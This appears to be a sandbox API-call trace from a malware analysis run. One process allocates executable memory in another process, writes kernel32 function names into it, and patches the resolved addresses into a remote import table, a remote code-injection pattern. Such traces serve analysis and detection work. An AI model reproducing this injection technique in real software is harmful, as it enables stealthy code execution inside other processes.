	[0187.790] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.790] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.790] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.790] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.790] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.790] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055198, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.790] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.791] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.791] lstrlenA (lpString="TerminateProcess") returned 16
	[0187.791] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.791] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb7224*, nSize=0x11, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb7224*, lpNumberOfBytesWritten=0x12857c*=0x11) returned 1
	[0187.791] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.791] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.791] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.791] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.792] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.792] ResetEvent (hEvent=0x478) returned 1
	[0187.792] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.792] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.792] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.792] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.792] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.792] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x1005519c, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.793] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.793] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.793] lstrlenA (lpString="IsProcessorFeaturePresent") returned 25
	[0187.793] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.793] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb7238*, nSize=0x1a, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb7238*, lpNumberOfBytesWritten=0x12857c*=0x1a) returned 1
	[0187.793] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.793] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.793] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.793] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.794] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.794] ResetEvent (hEvent=0x478) returned 1
	[0187.794] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.794] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.794] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.795] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.795] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.795] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x100551a0, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.795] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.795] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.795] lstrlenA (lpString="IsDebuggerPresent") returned 17
	[0187.795] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.795] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb7254*, nSize=0x12, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb7254*, lpNumberOfBytesWritten=0x12857c*=0x12) returned 1
	[0187.796] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.796] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.796] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.796] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.796] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.796] ResetEvent (hEvent=0x478) returned 1
	[0187.796] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.797] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.797] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.797] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.797] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.797] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x100551a4, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.797] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.797] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.797] lstrlenA (lpString="GetStartupInfoW") returned 15
	[0187.797] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.797] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb7268*, nSize=0x10, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb7268*, lpNumberOfBytesWritten=0x12857c*=0x10) returned 1
	[0187.798] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.798] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.798] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.798] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.798] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.799] ResetEvent (hEvent=0x478) returned 1
	[0187.799] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.799] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.799] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.799] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.799] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.799] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x100551a8, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.799] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.799] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.799] lstrlenA (lpString="GetModuleHandleW") returned 16
	[0187.800] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.800] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb727a*, nSize=0x11, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb727a*, lpNumberOfBytesWritten=0x12857c*=0x11) returned 1
	[0187.800] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.800] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.800] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.800] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.800] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.801] ResetEvent (hEvent=0x478) returned 1
	[0187.801] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.801] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.801] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.801] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.801] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.801] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x100551ac, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.802] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.802] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.802] lstrlenA (lpString="QueryPerformanceCounter") returned 23
	[0187.802] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.802] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb728e*, nSize=0x18, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb728e*, lpNumberOfBytesWritten=0x12857c*=0x18) returned 1
	[0187.802] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.802] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.802] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.803] ResetEvent (hEvent=0x478) returned 1
	[0187.803] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.803] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.803] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.803] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.803] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.804] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.804] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.804] lstrlenA (lpString="GetCurrentProcessId") returned 19
	[0187.804] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.804] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb72a8*, nSize=0x14, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb72a8*, lpNumberOfBytesWritten=0x12857c*=0x14) returned 1
	[0187.804] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.804] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.804] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.804] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.805] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.805] ResetEvent (hEvent=0x478) returned 1
	[0187.805] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.805] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.805] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.805] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.805] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.805] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x100551b4, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.806] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.806] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.806] lstrlenA (lpString="GetCurrentThreadId") returned 18
	[0187.806] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x13, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.806] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb72be*, nSize=0x13, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb72be*, lpNumberOfBytesWritten=0x12857c*=0x13) returned 1
	[0187.806] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.806] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.806] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.806] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.807] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.807] ResetEvent (hEvent=0x478) returned 1
	[0187.807] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.807] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.807] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.807] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.807] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.807] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x100551b8, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.808] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.808] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.808] lstrlenA (lpString="GetSystemTimeAsFileTime") returned 23
	[0187.808] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.808] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb72d4*, nSize=0x18, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb72d4*, lpNumberOfBytesWritten=0x12857c*=0x18) returned 1
	[0187.808] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.808] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.809] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.809] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.809] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.809] ResetEvent (hEvent=0x478) returned 1
	[0187.809] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.809] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.809] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.810] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.810] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.810] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x100551bc, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.810] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.810] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.810] lstrlenA (lpString="InitializeSListHead") returned 19
	[0187.810] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.810] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb72ee*, nSize=0x14, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb72ee*, lpNumberOfBytesWritten=0x12857c*=0x14) returned 1
	[0187.811] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.811] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.811] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.811] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.811] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.811] ResetEvent (hEvent=0x478) returned 1
	[0187.811] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.812] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.812] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.812] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.812] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.812] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x100551c0, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.812] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.812] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.812] lstrlenA (lpString="ReadFile") returned 8
	[0187.812] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.812] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb7304*, nSize=0x9, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb7304*, lpNumberOfBytesWritten=0x12857c*=0x9) returned 1
	[0187.813] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.813] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.813] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
